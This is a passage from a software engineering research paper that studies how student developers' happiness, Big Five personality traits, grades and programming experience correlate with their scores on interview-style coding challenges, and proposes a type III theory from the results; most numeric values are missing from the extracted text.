personality and individual performance can now be considered to be established, mature, yet still relevant and increasing (cruz, da silva & capretz, ). no prior research investigated coding challenges and personalities. however, an older study by evans & simkin ( ) found that a personality trait was a statistically significant explanatory factor for mastering computer concepts. once again, we had to inspect related work on more generic performance. in their systematic mapping study on personality research in software engineering, cruz, da silva & capretz ( ) found conflicting evidence on the influence of personality and various conceptualizations of performance of developers. there have been reports of personality being a successful indicator of academic performance (layman, ) as well as not being a significant factor predicting academic performance (golding, facey-shaw & tennant, ). some research conflict was found about individual performance of programmers. positive relationships between personality traits and programming task performance wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. (shoaib, nadeem & akbar, ; karimi et al., ) have been found together with no significant relationship between personality and programming performance (bell et al., ). we see a mild indication that personality has an influence on individual performance while developing software and, in the absence of a strong trend, we include the construct in our conceptual model in the hope to shed some more light on the matter. even though the myers–briggs type indicator (mbti) is still the dominant framework for understanding and assessing personality in software engineering research, we are aware of its poor psychometric characteristics (pittenger, ) and that the five factor model (digman, ; mccrae & john, ) is a validated and better choice (mccrae & costa, ). the five factor model assesses personality along five dimensions, i.e., the big five, i.e., extraversion, agreeableness, conscientiousness, neuroticism and openness to experience. the participants’ personality was assessed with a validated german version of the big five inventory (lang, lüdtke & asendorpf, ). in addition to the mentioned variables, we also kept track of time pressure as a potential confounding factor. after each coding challenge we asked participants on a -point agreement scale if they agree that they were under time pressure when solving this coding challenge. analysis procedure we first report how we assessed solutions to the coding challenges to obtain an overall performance score. then we describe how we analyzed the data to answer the research question. assessing the coding challenge solutions the way solutions to coding challenges are evaluated in interviews and programming contests varies, but in the latter there seem to be more objective and absolute judgment criteria than in technical job interviews. it is common for solutions to be evaluated for correctness in programming competitions, and for this purpose there are a couple of test cases for each coding challenge. however, different evaluation schemes have been proposed that differ in the way of assessing solutions which pass some test cases (kemkes, vasiga & cormack, ). for example, the acm icpc only differentiates between a correct and an incorrect solution. if any test case fails, then a solution receives no points. the more problems a team solves, the higher it is ranked and in case of a tie, the time needed to solve the problems is the decisive criterion (bloomfield & sotomayor, ). the google code jam works in a similar way, except that each time a participant submits an incorrect solution he or she receives an additional time penalty. in case of a tie, the participant with the lowest penalty time will be ranked first. other scoring schemes award points for each successful test case. kemkes, vasiga & cormack ( ) proposed to award full score for each batch of tests if the solution produces a correct output for any test case in that batch. in addition to judging the correctness of a solution, some contests also have a time limit in which a solution has to produce a correct output for a given test case (bloomfield & sotomayor, ). this forces participants of a programming competition not only to find a correct algorithm but also to find an efficient one. wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table scoring scheme. mapping from a solution’s time complexity class to score. challenge challenge challenge complexity score complexity score complexity score o(n) . o(n) . o(n) . o(n·log(n)) . o(n·w) . o( n) . o(n ) . to assess a participant’s performance we imitated how recruiters evaluate the performance of candidates in technical job interviews, that is in relation to each other and with respect to correctness and time complexity (mcdowell, ). the latter aspect was told the participants before the start of study. although it would have been possible to determine the best possible time complexity class of an algorithm to the given problems, we could not be sure that this solution could be achieved under the conditions of our study. it was therefore essential to assess the participants’ solutions in relation to each other. additionally, we made use of the all-or-nothing scoring (kemkes, vasiga & cormack, ) principle known from several programming competitions. for a participant’s solution to a single coding challenge we first run automated test cases on the given source code to see if it produced correct results. if any test case failed, the solution was considered to be incorrect and given zero points. if the solution passed all test cases we analyzed its time complexity. a concrete scoring scheme based on our results is provided in table . solutions in the best given time complexity class, which, in our scenario, were the solutions with the most efficient algorithm for the problem, were given one point. in case participants came up with more than one correct algorithm in different complexity classes, the solutions were ranked and evaluated on a linear scale between zero and one. this means, for example, that for two correct solutions in different time complexity classes the second best solution receives a score of . , whereas for three correct solutions in different time complexity classes the second best receives a score of . and the third best solution receives a score of . . as the third coding challenge was expected to be the hardest one, we multiplied the achieved score for the third coding challenge by a factor of . . the overall performance score of a participant was obtained by summing up the scores for each of the three coding challenges. the maximum score achievable was . . data analysis to answer the research question, we calculated several correlation coefficients between a participant’s coding challenge performance score and the quantitative answers to the questionnaire items which operationalized the candidates for predictor variables provided in fig. . we used correlation coefficient calculations which range from− to+ to explore which individual characteristics were related to the performance in solving coding challenges. we are aware of an open debate (murray, ) on whether likert scales represent ordinal or continuous intervals. while the debate still does not have clear indications, we opted to consider all our scales to be continuous in nature and likert items are discrete values on a continuous scale. therefore, we use pearson’s correlation coefficient where its assumptions wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. are met, and spearman’s rank correlation coefficient otherwise. we met the latter case for affective states, work experience, experience with coding challenges and the study progress. we report all calculated correlation coefficients with emphasis on moderate and strong relationships in the following section. the anonymized raw data for this study is available in the supplements of the present paper. results we characterize our participants in the ‘methods’ section. we refer to them in this section using a post-experiment anonymous identifier in the form of px, where x ranges from to . the identifier also represents the ranking of the participants, where implies the highest coding challenge performance score. we first want to report on the performance of each participant to provide a clear overview of the frequency of time complexity classes for correct solutions and how the overall score for each participant is achieved. table shows the concrete scoring scheme and table shows the resulting scores for the participants and illustrates the effect of our scoring scheme. due to the multiplication factor of . for the third coding challenge, the weakest solution to the third coding challenge receives the same score as the best solution to the easier coding challenges. however, the ranking order of the participants would not look much different with equal factors of . for all three coding challenges. p would have the same score as p to p . p would be ranked after p and before p . the average participant had . correct solutions and a score of . out of a maximum score of . . eleven participants scored the median and mode value of . . only one participant achieved the highest possible score and four participants solved none of the challenges correctly and thus had a score of . from table we see that participants came up with a solution to the first coding challenge but only two participants were able to implement something different from the brute-force algorithm. for the second challenge, of correct solutions, nine run in linear time, which is the best possible for all challenges. participant p as well as p to p were close to a solution for the second challenge but they did not implement the termination condition for their loop correctly which resulted in failed test cases. the third coding challenge was solved by six participants. although the number of correct solutions was the smallest of the three coding challenges and the number of complexity classes to which these solutions belong was not higher than for the other coding challenges, with four different algorithms the diversity of correct solutions was the highest. after each coding challenge, participants had to indicate on a -point likert scale how much they were under time pressure when solving the task they had previously worked on. accordingly, for the first coding challenge the average time pressure was . and . for only those participants who came up with a correct solution. for the second coding challenge the average time pressure was . and . for participants with correct solutions. the median value was and the mode was for both coding challenges, which means that participants most often disagreed with the statement that they felt under time pressure. this is different for the third coding challenge for which the average time pressure was . (median= . , mode= ) and . for the six participants with a correct solution. wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table performance scores. individual performance of the participants. each row contains the time complexity classes of a participant’s correct solution to the corresponding challenge. incorrect solutions are marked with a dash. participant challenge challenge challenge score p o(n) o(n) o(n) . p o(n·log(n)) – o(n) . p o(n ) o(n) o( n) . p o(n ) o(n) o( n) . p o(n ) o(n) o( n) . p o(n ) o(n·w) o( n) . p o(n ) o(n) – . p o(n ) o(n) – . p o(n ) o(n) – . p o(n ) o(n) – . p o(n ) o(n) – . p o(n ) o(n·w) – . p o(n ) o(n·w) – . p o(n ) o(n·w) – . p o(n ) o(n·w) – . p o(n ) o(n·w) – . p o(n ) o(n·w) – . p o(n ) o(n·w) – . p o(n ) o(n·w) – . p o(n ) o(n·w) – . p o(n ) o(n·w) – . p o(n ) o(n·w) – . p o(n ) – – . p o(n ) – – . p o(n ) – – . p o(n ) – – . p o(n ) – – . p o(n ) – – . p – – – . p – – – . p – – – . p – – – . happiness for our participants the average spane-p(ositive) value of . was higher than the average spane-n(egative) value of . and each of the six positive states that contribute to the spane-p value were higher on average than their counterparts. the spane-b (mean = . , sd= . ), % ci [ . – . ] affect balance score did not differ significantly from the recently established normative scores for the software developer population (graziotin et al., ). wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table correlation results for happiness. summary of the correlation coefficients between the coding challenge performance score and items of the scale of positive and negative experience (spane) for op- erationalizing happiness (n= , * p < . , rs is spearman’s rank correlation coefficient). one participant did not indicate the frequency for all of the affective states. for this reason we dropped his or her record. variable rs spane-b . spane-p . spane-n − . positive − . negative . good − . bad − . pleasant . unpleasant . happy − . sad − . * joyful − . afraid − . contented − . angry − . our results show that there is a significant moderate negative relationship between sad and the coding challenge performance score, rs( )=− . , p < . . with reference to the discussion in the ‘analysis procedure’ section and for the sake of completeness, for this affective state r( )=− . . as higher values for the affective states stand for higher frequencies, this negative correlation means that participants who had often been sad in the past four weeks tended to perform worse. the spearman’s rank correlation between bad and the performance score is weak negative, rs( )=− . , and additionally there is a weak positive relationship between pleasant and the performance score, rs( )= . . the p-values for these two correlations are above the significance level of . . correlation coefficients for other affective states are given in table . personality for assessing a participant’s personality we used the five factor model which describes a personality by the five traits of extraversion, agreeableness, conscientiousness, neuroticism and openness. table shows the correlation coefficients between the traits and the coding challenge performance score. what we see from our results is that there is a significant moderate negative relationship between conscientiousness and the performance score, r( )=− . , p < . . there also is a weak negative relationship between extraversion and the performance score, r( )=− . . for the other three personality traits there is no relationship in our data. academic performance the variables for the academic performance provide the highest values for pearson’s r in our data set. from the results shown in table we see that there is a strong negative wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table correlation results for personality summary of the correlation coefficients between the big five personality traits and the coding challenge performance score (n= , * p < . ). variable pearson’s r extraversion − . agreeableness − . conscientiousness − . * neuroticism − . openness . table correlation results for academic performance. summary of the correlation coefficients between the coding challenge performance score and variables operationalizing the academic performance (* p < . , rs is spearman’s rank correlation coefficient, n is the number of participants for whom a measurement was possible). variable pearson’s r rs n current gpa − . * b.sc. gpa (master students only) − . grade for data structures and algorithms course − . * grade for algorithms and complexity course − . study progress . relationship between the performance scores and the grade point averages master students received in their bachelor’s degree, r( )=− . . also, there is a significant strong negative relationship between the performance scores and the grades for the data structures and algorithms course, r( )=− . , p < . and a significant moderate negative relationship between the performance scores and the current grade point average, r( )=− . , p < . . as in germany lower grades are better than higher ones, these negative relationships mean that participants with better grades were also the better coding challenge solvers. the grade point average for the data structures and algorithms course was . (sd= . ) in our sample and therefore much better than the grade point average for the algorithms and complexity course which was . (sd= . ). we only see a weak negative correlation for the latter course with the coding challenge performance score, r( )=− . . study progress was represented as a three-valued factor: students at the beginning of their bachelor’s program ( participants), students that are at least in the fourth semester of the bachelor’s program ( participants) and master students ( participants). the participants in the first group had an average score of . (median = . ). those in the second group had a score of . (median = . ). the third group had an average score of . (median = . ). the highest score of . was achieved by a master student, the maximum score in the group with the advanced bachelor students was . and the maximum score for the students at the beginning of their bachelor’s program was . . we found a weak positive relationship between the study progress and the performance scores, rs( )= . . wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table correlation results for experience. summary of the correlation coefficients between experience and the coding challenge performance score (n = , * p < . , rs is spearman’s rank correlation coeffi- cient). variable pearson’s r rs coding challenge experience . programming experience . * java experience . work experience . experience in the last part of the questionnaires, we asked the participants experience-related questions. programming experience, experience with java, and experience with working in a company with focus on software development were measured in years. experience with coding challenges in the past year was indicated by the participants on a -point frequency scale. from table we see a significant moderate positive relationship between the coding challenge performance score and the programming experience of a participant, r( )= . , p < . . on average, participants had . years of programming experience (sd = . ). for the work experience, coding challenge experience and the experience with java we only observed weak positive relationships with the performance score. participants answered that they never had experience with coding challenges in the last year, five participants did coding challenges once or twice per semester, five participants did them once or twice per month and one had experience with coding challenges once per week. when we asked the participants afterwards what their concrete experience with coding challenges was, they mainly told us about exercises they had to do for the algorithms and complexity class and that these exercises were pretty similar to the coding challenges we used in our study. the one participant who indicated to solve coding challenges once a week told us that he or she solves them for fun on the internet. this participant had the second best coding challenge performance score of . , while the participant with the best performance score of . had not done any coding challenges in the past year. we finally asked participants for their open-source profiles and their stack overflow profile to explore the contributions to the respective communities and see how they correlate with the scores in the coding challenge performance. of the participants only four participants had a stack overflow profile, three of whom have contributed at least one question or answer to the network. the coding challenge performance scores for these three participants were above average, but their contributions were made mainly to fields unrelated to java, algorithms or programming puzzles. more participants provided us with a url to their github or gitlab profiles and eight of them contributed at least one public pull request, but we did not observe a relationship between the number of pull requests and the performance score. the eight participants with public open-source contributions had an average performance score of . , which is slightly higher than the average performance score of . for participants without public open-source contributions. the majority of projects they contributed to were programmed in java or javascript. wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. discussion findings we found some significant correlations between individual characteristics and the coding challenge performance. first, we would like to state that we are aware that reporting p-values in exploratory studies is potentially problematic (rubin, ; neuroskeptic, ) because of the open debate of what these p-values really represent (e.g., a null hypothesis significance testing of an absence of relevant factors in the first place). the discussion is so recent that we opted for the conservative choice to use p-values and their classic value for significance (p < . ) as a threshold to include (or exclude) variables in our theory. our theory provides relationship links—which are of correlation type and not causality—and indications for the polarity of these relationships. the theory, however, does not include numerical assessments of the strength of these relationships. they are outside the scope of an exploratory study towards a type iii theory. happiness in the ‘conceptual model’ section we justify happiness as a candidate predictor variable by findings on the positive impact of happiness and affect on job performance and analytic problem-solving. for example, one finding by graziotin, wang & abrahamsson ( ) was that happy software developers perform significantly better in analytic problem-solving. in our study, we could not find a positive correlation between spane-b and the coding challenge performance, rs( )= . . we only observed a weak positive relationship between the positive affective state pleasant and the performance, rs( )= . . however, we found that sad software engineers performed significantly worse, rs( )=− . , p < . . we believe that there could be a cause–effect relationship between sadness and the coding challenge performance because of the participants who felt sometimes or often sad in the past four weeks (approximately %), nobody came up with a correct solution to coding challenge . furthermore, for the first two challenges, no one came up with an algorithm different from brute-force solutions. consequently, none of the sad participants had a score higher than . . one possible explanation for the misalignment between our study results and those of the graziotin, wang & abrahamsson ( ) study results could be that coding challenges constitute an atypical programming task and, therefore, the performance in coding challenges does not necessarily coincide with software development performance. we offer this speculation for future studies to explore. personality the personality trait conscientiousness showed a significant moderate negative relationship with the coding challenge performance score, r( )=− . , p < . . this means the higher the score for conscientiousness, the lower the coding challenge performance score. conscientiousness describes the extent to which a person is a reliable worker, perseveres wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. until the task is finished, does a thorough job and does things efficiently. a conscientious person is not careless, does not tend to be disorganized or lazy, and is not easily distracted. to understand the relationship between the performance and the personality trait we inspected the answers to the statements of the big five inventory of the six participants with the highest performance score. interestingly, they tended to be reliable workers, which increased their score for conscientiousness, and they did not tend to be easily distracted, which would have lowered their score for the personality trait. their average score for conscientiousness was . , which is only slightly below the average value of . for the rest of the sample. beside pearson’s r, we also always considered spearman’s rho to avoid wrong assumptions due to the possibly strong influence of outliers and sequences which are not entirely homoscedastic. still there was a negative monotonic relationship, rs( )=− . . although we cannot explain the relationship, based on our findings, we would like to state the hypothesis that conscientious persons perform worse in coding challenges and let future research examine this relationship in more detail. as existing literature found particular personality types to positively correlate with programming task performance (see cruz, da silva & capretz ( ) for their systematic mapping study) and even that conscientious programmers perform better in programming tasks (karimi et al., ) we would like to repeat our speculation that coding challenges may differ from ordinary programming tasks and invite future studies to investigate the differences. for the other personality traits of the five factor model, i.e., extraversion, agreeableness, neuroticism and openness, we did not observe any significant correlation with the coding challenge performance. academic performance we found moderate to strong linear correlations between two gpa-related variables and the performance score. the significant moderate negative relationship between the current gpa and the performance score, r( )=− . , p < . , shows that students with better grades performed better in the coding challenges. additionally, the pearson’s correlation coefficient between the b.sc. gpa and the performance score was strongly negative, r( )=− . , but due to the small number of master students, the relationship could have occurred by chance (p= . ). many of the bachelor students at the end of the second semester mentioned that their current gpa consisted only of one or two grades. as this group of students made up about % of our sample, this should be taken into account. however, because we observed more negative relationships for grade-related variables, it can be reasonably assumed that we would have observed a negative relationship also if students had taken more than one or two exams. there was only a weak positive correlation between study progress and the performance score, rs( )= . , and we observed that the group of higher bachelor semesters performed best. in discussions after the study, participants told us that in the algorithms and complexity course, students nowadays have to solve tasks similar to the coding challenges we used in our study. as this course is usually taken in a higher bachelor semester, this wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. could have been the reason why they performed better on average than both the younger bachelor students and even the master students since their knowledge was still fresh. furthermore, as students at the beginning of their bachelor’s program performed worst and master students did not perform much worse than students in a higher bachelor semester, we assume that there is a baseline of knowledge one has to be aware of when solving coding challenges but further academic progress does not necessarily make a coding challenge solver better. taking all this, and especially the previous paragraph, into consideration, we cannot fully assume that receiving better grades leads to better coding challenge performance. but we can speculate that there is a confounding variable that predicts how well a student performs in his or her exams and how well he or she performs in solving coding challenges. further, our results show a significant strong negative relationship between the grade for the data structure and algorithms course and the performance score, r( )=− . , p < . . again, this negative correlation means that students with better grades were the better coding challenge solvers. for the weak negative relationship between the grade in the algorithms and complexity course and the performance score, r( )=− . , we would like to note that some of the participants were examined by a different examiner and they told us that therefore the exam became easier. a good understanding of data structures and algorithms is fundamental for finding an efficient algorithm to a given coding challenge. therefore, we assume that a good preparation for the data structure and algorithms exam not only leads to a good grade but also improves the coding challenge performance. taking this finding one step further, it provides at least an indication of how the targeted preparation for solving coding challenges could have an impact on the coding challenge performance. experience for the experience-related variables we observed a weak positive relationship between the coding challenge experience and the performance, rs( )= . , between the java experience and the performance, r( )= . , as well as between the work experience and the performance, rs( )= . . the weak correlation coefficient for the java experience could be explained by our selection of coding challenges which do not require specific knowledge of the programming language. the positive relationship between the experience with coding challenges and the performance in solving such is in line with what revilla, manzoor & liu ( ) found. they conclude, from statistics of an online judging system, that solving more coding challenges increases the individual acceptance rate and decreases the rate of wrong answers as well as of compilation errors, while the rate of submitted solutions that exceed a given time limit doesn’t change. for problems with a low acceptance rate the wrong answer rate almost remained the same, independently of the number of problems a user solved. bloomfield & sotomayor ( ) claim that the biggest success factor for programming competitions are training activities like working through problems and running team sessions in which problems are discussed. unfortunately, they do not provide evidence other than by reporting their own experience. although in our sample the best coding challenge solver did not have any experience with coding challenges in the past wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. year and the overall correlation between coding challenge experience and coding challenge performance is weak, we recommend future research on the effect of targeted preparation for solving coding challenges. in our sample very few people have had experience with coding challenges other than in assignments of university courses. more importantly, we observed a significant moderate linear relationship between the years of programming experience and the coding challenge performance, r( )= . , p < . . we justified the inclusion of our variables with existing literature, so we expected to find a relationship between experience and coding challenge performance. however, the particular correlation between programming experience in years and a software engineer’s performance in solving a programming task was not consistently observed to be positive in the past. for example, demarco & lister ( ) did not find a correlation between the years of programming experience and the performance in terms of time to complete a programming task, at least not for participants with more than six months’ experience. those participants with less than six months’ experience performed worse than the rest. the contradictory results could be due to the difference in the programming tasks and the different definitions of performance. working as fast as possible on an ordinary programming task arguably requires different skills than finding an efficient algorithm to a coding challenge. according to our results we believe that an increase in programming experience leads to a better coding challenge performance. this might only hold true until a threshold is reached but it seems to be greater than the six months observed by demarco & lister ( ). theory for predicting the performance in solving coding challenges the proposed theory for predicting the performance in solving coding challenges is provided in fig. . we theorize that individual characteristics, such as happiness, personality, academic performance, and experience are predictive for the performance in solving coding challenges. our theory is meant to be what gregor ( ) calls a type iii theory. we already gave a brief overview and definition of this theory type in the ‘background’ section. we used the work of gregor ( ) as a framework to build and represent our theory. we will now use the framework as a benchmark to discuss how each of the structural components of theory is present in our work. means of representation is defined as the physical representation of the theory (gregor, : ). our theory is represented by words and a diagram (fig. ). constructs ‘‘refer to the phenomena of interest in the theory’’ and ‘‘all of the primary constructs in the theory should be well defined’’ (gregor, : ). primary constructs of our theory are coding challenges, the coding challenge performance, and the four constructs we refer to as individual characteristics, namely happiness, personality, academic performance and experience. we defined the term coding challenge in the ‘background’ section as an algorithm and coding problem used to assess a programmer’s problem- solving skills. the performance in solving coding challenges is obtained by aggregating the individual scores for solutions to each one in a set of coding challenges. we describe the scoring algorithm for a single coding challenge and the aggregation algorithm in the ‘analysis procedure’ section. algorithm complexity is a highly relevant concept for wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. individual characteristics - happiness affective state sad - personality personality trait conscientiousness + academic performance gpa and data structures and algorithms course grade + experience programming experience in years coding challenge performance figure summary of the obtained theory for predicting the performance in solving coding challenges. connecting lines depict a significant positive or negative correlation between the coding challenge performance and operationalizing variables for each of the four constructs of individual characteristics. full-size doi: . /peerjcs. /fig- obtaining the coding challenge performance score, but we see this construct covered by the definition of the coding challenge performance. happiness, personality, academic performance and experience have all been defined in the ‘conceptual model’ section. statements of relationship ‘‘show relationships among the constructs’’ (gregor, : ). correlations are the degree of relationship between variables of individual characteristics and the coding challenge performance. the affective state of sadness is negatively correlated with the performance in solving coding challenges. the same applies for the personality trait of conscientiousness. gpa and the grade in the data structures and algorithms course are positively correlated with the performance in solving coding challenges. the same applies for programming experience in years. testable propositions as theory component describes the necessity that statements of relationships can be tested empirically (gregor, : ). the statements of relationships in our theory could be tested. we obtained them empirically using proven statistical methods. furthermore, the paper presents testable propositions of the theory to be further tested by future work. scope ‘‘is specified by the degree of generality of the statements of relationships (signified by modal qualifiers such as ‘some,’ ‘many,’ ‘all,’ and ‘never’) and statements of boundaries showing the limits of generalizations’’ (gregor, : ). the previously defined statements of relationships include no modal quantifiers. we do not believe limitations of our study (see the related section) to have an influence on the scope in which our statements of relationships hold true. it might be the case that in a different context, further variables such as the stress level or the sympathy for the candidate might have an influence on the rated performance. these additional variables could be significant but are believed to not invalidate our statements of relationships. the theory might therefore be refined and extended by further individual characteristics and by contextual variables in the future. causal explanations and prescriptive statements are not present due to the nature of type iii theories. wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. we are grateful to two anonymous reviewers for going above and beyond in suggesting challenging and interesting limitations of the study limitations the study design, as described in the ‘methods’ section, has some limitations which have to be considered when interpreting the results and defining the scope of our proposed theory. these limitations are about the sample, the adherence to real-world settings, the design of the challenges, and the elements of the theory itself. the sample was limited in size and consisted solely of students, all of which were bsc and msc students from a german university. this limits the way we can generalize our theory as the sample might poorly represent students worldwide as well as job seekers. we believe, however, that our sample, while limited in terms of nationality and place of study, represented the desired population fairly, that is potential hires of successful it companies. we also ensured that the sample did cover academic status well as we invited students whose academic progress ranges from the beginning of the bachelor’s program to the end of the master’s program. we could not ensure that the settings of our study would fully reflect the settings of a job interview, especially in terms of stress and anxiety and participants’ preparation. in a real-world setting, a job position is at stake and the interviewee is not anonymous and faces the interviewer. in case the candidate has to write source code on a whiteboard, stress and cognitive load are additionally reinforced (behroozi et al., ). instead, in our study we tried to create a relaxed atmosphere and that is what an interviewer should do. future work can examine the performance of candidates in real technical interviews and assess the individual characteristics of the candidates. similarly, our participants did not prepare for solving coding challenges in the past. in real-world settings, a candidate will ideally prepare for the interview, including the coding challenges part. we coped with this issue by operationalizing the variable experience with coding challenges. not much research has been done yet to examine the effect of targeted preparation for coding challenges so we do not know about its impact and how well our results can be applied to a group of software engineers who all recently prepared for programming interviews or programming competitions. the issue is also less threatening for us as solving the challenges we chose does not require knowledge of particular programming language features or the like that an unprepared software engineer would not have. future research can repeat our study with prepared participants and see if and how the results differ. our choice of tasks and their scoring reflects real-world settings as closely as possible, coming all from the related literature, yet it carries several assumptions that we feel should be clarified here. first, we did not assign partial scores for correctness nor did we take into account the quality of the code being produced. as mentioned in section ‘assessing the coding challenge solutions’ and further discussed by kemkes, vasiga & cormack ( ), different strategies for assessing computing competition tasks have existed for some time. we opted for the all-or-nothing principle because we have hardly touched any edge or special cases with our software tests, and we have already excluded some special cases by limiting the input parameters in the task description. consequently, solutions were only marked as incorrect if they really did not correctly implement the basic functionality required. we opted to lose information as the price to pay to ensure objectivity in the assessment. we will elaborate more on this after introducing another potential issue, that wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. is that we did not consider the quality of the code being produced. we recognize that code quality is relevant, to a certain extent, when programming occurs in an interview. mcdowell ( ) lists the following properties for good code that employers want to see: correct, efficient, simple, readable and maintainable. while we looked at the first two properties, correctness and efficiency, we did not consider simplicity, readability, maintainability or other code quality characteristics when we evaluated the solutions. we chose problems to which possible solutions usually should be around ten to twenty lines long, not expecting much variability in the produced code. we also encouraged participants to focus on correctness and efficiency so that our evaluation process was as objective as possible. on our two reasons to opt for the previously mentioned tradeoffs for gaining in objectivity. we performed a sensitivity analysis to establish what would happen if we gave up some objectivity and assigned points for recognizably correct approaches with incorrect implementations. we inspected solutions for which at least one test case failed. for the first challenge, all four incorrect solutions were completely wrong so that we would not have awarded partial points for any of them. for the second challenge, we received incorrect solutions. p , p , and p were close to a correct solution and we could have awarded partial points for a correct approach. if we had done so, they would have received a score less than . (less than the score for a correct solution) in the worst time complexity class for this challenge, and this would not change the final ranking of the participants. this is because p to p would then still have a lesser score than p . p would still be placed second. for the third challenge we find it very difficult to evaluate most of the incorrect approaches scoring points for their partial correctness. they all fail in most test cases and approach the problem in very different ways, but we cannot say how much extra effort would have been needed to arrive at a working solution. for almost half of the incorrect solutions, we concluded that they would not deserve partial points, either because there is no implementation at all or because participants found the solutions to a few values of the input parameter n manually and return them in an if-else-cascade. the other half of the solutions are difficult to compare with each other or with one of the sample solutions so that we cannot objectively give partial points to them at all. the above reasoning on assigning points only to correct solutions and not to judge code quality might introduce a further potential threat to the design of our study, that is that one might conclude that on average, a candidate should strive to answer all questions with suboptimal times; otherwise, attempting to find the ideal time complexity (and failing) could result in performing worse. in parts we agree to this assumption but we do not see it to be severe in the challenges we opted to use. for the first task, the suboptimal solution was arguably very obvious and after the implementation there might not have been enough time to think about the optimal algorithm. our guess is that most participants would not have come up with the ideal solution even if they had been told what the minimum time complexity is and that they should try to implement such a solution. our guess is based on informal discussions with the participants that we had after the study and in which we discussed the optimal solution. for the second task, we see no strong difference in effort between the suboptimal solution and the ideal solution, as we believe that only realizing wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the optimal solution would drive the participant to its implementation. for the third task, most of the participants already had issues in finding any correct solution at all. some of the suboptimal solutions we received for this task were also much more complex to implement than the solutions presented in the manuscript. when introducing the participants to the study, we explicitly told them that there was no advantage in submitting a solution before time was up and that they could improve their solution with any remaining time. so even if they had started with a brute-force solution, they would have had a chance to improve their solution. we also recorded the time taken to complete a task. from this data and from their responses to the perceived time pressure, we see that many of the participants had completed at least the first two tasks before the available time had elapsed. we would like to make a few observations on the actual results that we obtained. as one would expect, our participants did not perform equally good in our three tasks. the ability to solve the challenges decreased as difficulty increased (see table ). the third and most difficult challenge was solved by only six participants, only two excelled with it and, overall, only one participant obtained the highest possible score. the situation of having one top performer and other five fairly good performers might appear to be a limitation, as it might appear that tasks were too difficult or even that coding challenges are not a suitable tool for job interviews as they are likely to yield high performers. this is by design, and we did not expect many participants to excel overall. challenge , in particular, was intended to separate the really good participants from the average ones. the design of the tasks follows guidelines for coding challenges from the literature (‘coding challenges’ section), so the coding challenges are tasks that companies adopt for pre-interviews and interviews. our environment and task successions, while artificial, are supposed to adhere to the real-world situation. the only deviation was that sometimes companies adopt even more tasks than we did, and we could not demand more time from our participants to add more tasks. while it would have been more scientifically interesting to end up with some more top performers, this did not happen, and only repetitions of this study would be able to tell us if that was by chance. finally, the elements of our conceptual model are just one possibility for forming an initial theory on individual characteristics of coding challenge performance. many other factors were not included in the model, including but not limited to cognitive processing abilities, further tests for knowledge of the involved domains, and salient characteristics such as sleeping time. to recap, we opted to derive factors from psychology, education, and software engineering literature that have been suggested to correlate with (or cause) performance that is similar to the one we look for. the factors we included are also easily verifiable at interview stage by companies. an alternative to this approach would have been to conduct an exploratory qualitative study to derive a richer set of factors from the experiences and perceptions of participants. however, such a type of study, while interesting and welcome for future work, would have prevented us from providing an initial evaluation of which of those factors are likely to have an influence on the dependent variable. we see that coding challenges are a central and pressing topic in software companies, startups and corporations alike, and we believe that a first quantitative, yet deeper, quantitative exploration brings interesting and practical results than a qualitative, broader yet shallower wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. exploration. ultimately, we believe that the robustness of our methodology which closely follows an established framework for theory building, classification, and representation, comprises strong building blocks for future validation studies as well as studies to identify further factors and enrich our theory. implications the theoretical implications of our study lie in the theory itself. we constructed the theory systematically by inspecting the literature to construct a conceptual model and then performed a first validation of the model in an exploratory study. the theory is thus grounded in empirical data. we request future studies to validate the theory under different settings and samples, as well as extend it with further constructs that we could not include in the present study. our theoretical contributions provide basic building blocks in the body of knowledge of software engineering research. the practical implications of our theory are limited, yet the results of the study are interesting to software companies and practitioners, should they be generalized. each company that assesses a candidate’s performance with coding challenges should be aware of the negative correlation between the personality trait of conscientiousness and the candidate’s performance. there is a need for personality diversity in software engineering, among other things, because ‘‘there is no single personality type that fits the wide spectrum of tasks that encompass the engineering of software’’ ([ ], p. ). some studies showed a relation between personality diversity and team effectiveness, others showed the contrary (cruz, da silva & capretz, ). conscientiousness is one of a few personality traits which are believed to positively correlate with a software development team’s effectiveness (yilmaz et al., ) and individual satisfaction (acuña, gómez & juristo, ). as a consequence, the decision for or against the use of coding challenges for the evaluation of a job candidate’s performance should take the personality diversity of the other team members into account. in case coding challenges have to be solved—whether in technical interviews or in programming competitions—interviewers and organizers should always be interested in the well-being of the coding challenge solvers. this can be seen as a general recommendation regardless of our results which indicate a negative correlation between the affective state ‘‘sad’’ and the coding challenge performance. google, for example, measured each candidate’s experience with their interview process and found this to be correlated with the proportion of candidates who accept the job offer as well as the percentage of rejected candidates who would still recommend the company to a friend (google inc., ). however, even when taking care of the overall experience with the interview process, the comparison of two job candidates based on their performance in solving coding challenges could be biased due to differences in their happiness. this might not easily be accessible or directly improvable. a corrective action a company could apply is to give a second chance to candidates for whom the interviewer felt that 